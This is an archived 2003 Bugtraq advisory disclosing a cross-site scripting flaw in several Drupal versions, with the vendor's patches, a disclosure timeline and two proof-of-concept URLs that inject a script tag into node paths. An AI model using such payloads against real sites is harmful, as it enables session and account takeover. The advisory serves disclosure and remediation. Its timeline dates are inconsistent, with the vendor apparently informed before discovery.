| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <001101c34f48$a71b7520$d764aec3@SS> Date: Mon, 21 Jul 2003 08:26:30 +0300 From: "Ferruh Mavituna" <ferruh@...ituna.com> To: <bugtraq@...urityfocus.com> Subject: Drupal XSS Vulnerability (main page and sub pages) ------------------------------------------------------ Drupal XSS Vulnerability (main page and sub pages) ------------------------------------------------------ Any kind of XSS attacks possibility. An attacker could access other users/admin drupal accounts. ------------------------------------------------------ About Drupal; ------------------------------------------------------ www.drupal.com Drupal is an open-source platform and content management system for building dynamic web sites offering a broad range of features and services including user administration, publishing workflow, discussion capabilities, news aggregation, metadata functionalities using controlled vocabularies and XML publishing for content sharing purposes. Equipped with a powerful blend of features and configurability, Drupal can support a diverse range of web projects ranging from personal weblogs to large community-driven sites. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ TESTED; Drupal 4.2.0 RC NOT TESTED - %90 VULNERABLE; Drupal 4.1.0 Drupal 4.0.0 Drupal 3.0.2 Drupal 3.0.1 Drupal 3.0.0 Drupal 2.0.0 Drupal 1.0.0 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ Drupal 4.2.0 RC ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Vendor replied and fixed quickly. ------------------------------------------------------ Solution & Patches; ------------------------------------------------------ xss-cvs.patch xss-4.2.0-rc.patch xss-4.1.0.patch Download Patch Files : http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip Better one download new version from www.drupal.org [All files provided by Vendor] ------------------------------------------------------ Exploit Code; ------------------------------------------------------ http://[victim]/xxx"][script]alert(document.domain)]/script][" ------------------------------------------------------ Exploit - 2; ------------------------------------------------------ http://[victim]/node/view/666"><script>alert(document.domain)</script> Replace "[]","<>" ------------------------------------------------------ History; ------------------------------------------------------ 30.05.2003 - Discovered 03.05.2003 - Vendor Informed 03.05.2003 - Fixed by Vendor Ferruh Mavituna Web Application Security Specialist http://ferruh.mavituna.com ferruh@...ituna.com
Powered by blists - more mailing lists